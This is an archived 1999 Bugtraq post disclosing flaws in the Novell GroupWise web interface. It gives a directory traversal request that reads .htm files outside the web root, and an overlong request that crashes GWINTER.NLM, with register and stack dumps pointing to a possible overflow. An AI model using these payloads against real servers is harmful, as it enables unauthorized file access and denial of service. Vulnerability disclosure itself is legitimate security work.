Bugtraq mailing list archives
Re: Groupwise Web Interface
From: afrith () IBL BM (Andrew Frith)
Date: Wed, 22 Dec 1999 22:23:16 -0400
Setup: NT 4, SP4, IIS 4 Netware 4.11, SP7a, GW 5.5 SP2 - Internet Agent & Web access NLM 1. Web server path http://server/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request returns: Could not find file C:\<web server root>\cgi-bin\GW5\US\HTML3\HELP\BAD-REQUEST.HTM 2. Read files Using the format http://server/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index I can read any files that the web service account has read access to & that end in .htm or .html on the drive, not just in the web areas. 3. DOS? Sending <A HREF="http://server/cgi-bin/GW5/GWWEB.EXE?<tested">http://server/cgi-bin/GW5/GWWEB.EXE?<tested</A> with minimum of 512 characters> will cause an abend in GWINTER.NLM (See Break 1 below). The server appears to function normally. Trying to shut things down however...... Upon shutting down the Internet agent we then get another abend, again in GWINTER.NLM (See Break 2 below). The Internet agent will shut down. The web access will hang, until the server is downed. The NT box is unaffected by this. In the first abend GWINTER blows up. Also on the stack is GWENN2.NLM. Not much there. In the second abend GWINTER goes boom again. Also on the stack is GWCMC.NLM. What is a bit more interesting is that EBX = 61616161, or aaaa, what I was using on the command line. This string is also in the stack several times. I have been able to reproduce the above consistently. *********** Break 1: Server-4.11a: Page Fault Processor Exception (Error code 00000000) Registers: CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010 EAX = 72006165 EBX = E022BDA8 ECX = 00000004 EDX = 00000001 ESI = E022BDA4 EDI = E022A01C EBP = 00000002 ESP = 0A082F70 EIP = F1B6DD5D FLAGS = 00017297 F1B6DD5D 8A00 MOV AL,[EAX]= ? EIP in GWINTER.NLM at code start +00000D5Dh Running process: gwinter 5 Process Created by: GWINTER.NLM Stack pointer: A082D60 Stack limit: A063010 Scheduling priority: 0 Wait state: 00 Stack: --0000000A ? --E022C0D3 ? --E022BED2 ? --00000004 ? --0000024C ? --E022BECA ? --E022BD78 ? --E022BD84 ? --0A120131 ? --000001F4 ? --0A082FE8 ? --00000000 ? --E022A02C ? --E022A01C ? F1B6D53F (GWINTER.NLM|(Code Start)+53F) --E022A01C ? --E022A01C ? --E0228540 ? F1B81EF9 ? --E022A01C ? F148F0AD (GWENN2.NLM|GW2_NgwThrdCreate+1EE) --E0228540 ? --00000000 ? --E022A01C ? --00000000 ? --FB0513E0 ? --E020E7B0 ? --0A0F6A60 ? --FB0513E0 ? --0A125010 ? --0A083008 ? F10BC181 (THREADS.NLM|ScheduleWorkToDo+180) Additional Information: The CPU encountered a problem executing code in GWINTER.NLM. The problem may be in that module or in data passed to that module by another NLM. ********** Break 2: Server-4.11a: Page Fault Processor Exception (Error code 00000000) Registers: CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 0010 SS = 0010 EAX = 00000000 EBX = 61616161 ECX = 00000000 EDX = E0B9B4E0 ESI = 00000001 EDI = 00000096 EBP = 0A123C6C ESP = 0A123C68 EIP = F80BC070 FLAGS = 00017202 F80BC070 8B73FC MOV ESI,[EBX-04]= ? EIP in SERVER.NLM at code start +000BC070h Running process: gwinter 0 Process Created by: GWINTER.NLM Stack pointer: A123C60 Stack limit: A104010 Scheduling priority: 0 Wait state: 00 Stack: --00000000 ? --0A123C84 ? --00000096 ? --00000001 ? --61616161 ? F10B45ED (THREADS.NLM|free+63) --61616161 ? --0A123C94 ? --E022A01C ? F1B38537 (GWCMC.NLM|cmc_free+11) --61616161 ? --0A123FD8 ? F1B82341 ? --61616161 ? --00000008 ? --00000000 ? --0A125350 ? --0000890B (DS.NLM|DSF9085F20+55D8) F1B83C52 ? --0BB01F80 (FPSM.NLM|_fltused_+B01A) --00007286 (DS.NLM|DSF9085F20+3F53) --F915D970 ? --F915DAA0 ? --00000000 ? --0A123CF8 ? --0A123CF0 ? --0A0F6460 ? --00000001 ? --00000004 ? F80BC193 ? --00000004 ? --002E12E0 ? Additional Information: The CPU encountered a problem executing code in SERVER.NLM. The problem may be in that module or in data passed to that module by a process owned by GWINTER.NLM.
Current thread:
- Re: Groupwise Web Interface Brian (Dec 21)
- <Possible follow-ups>
- Re: Groupwise Web Interface Andrew Frith (Dec 22)